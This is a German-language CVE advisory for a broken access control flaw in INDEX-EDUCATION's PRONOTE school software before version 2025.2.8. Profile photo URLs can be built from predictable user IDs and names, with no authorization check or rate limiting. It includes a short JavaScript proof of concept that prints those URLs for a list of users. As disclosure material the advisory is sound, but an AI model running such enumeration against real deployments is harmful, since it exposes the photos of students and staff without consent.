
CVE-2025-69727
PRONOTE - 202X.X.X < 2025.2.8
Eine Schwachstelle durch unzureichende Zugriffskontrolle existiert in INDEX-EDUCATION PRONOTE vor Version 2025.2.8. Die betroffenen Komponenten (composeUrlImgPhotoIndividu) ermöglichen die Konstruktion von direkten URLs zu Benutzerprofilbildern, die ausschließlich auf vorhersagbaren Identifikatoren wie Benutzer-IDs und Namen basieren. Aufgrund fehlender Autorisierungsprüfungen und fehlender Ratenbegrenzung beim Erzeugen oder Zugreifen auf diese URLs kann ein nicht authentifizierter oder nicht autorisierter Akteur Profilbilder von Benutzern abrufen, indem er Anfragen mit erratenen oder bekannten Identifikatoren erstellt.
const arr = [] // List of users
const base = "https://demo.index-education.net/pronote";
IE.fModule({
f: function (exports, require, module, global) {
const ObjetElement = require("ObjetElement");
const AccesApp = global.GApplication;
const comm = AccesApp.communication;
for (const obj of arr) {
const path = comm.composeUrlFichierExterne(
obj.L.replace(/[\s]/gi, "_") + ".jpg",
new ObjetElement.ObjetElement("", obj.N)
);
const url = `${base}/${path}`;
console.log(url);
}
},
fn: "testIEmodule.js",
});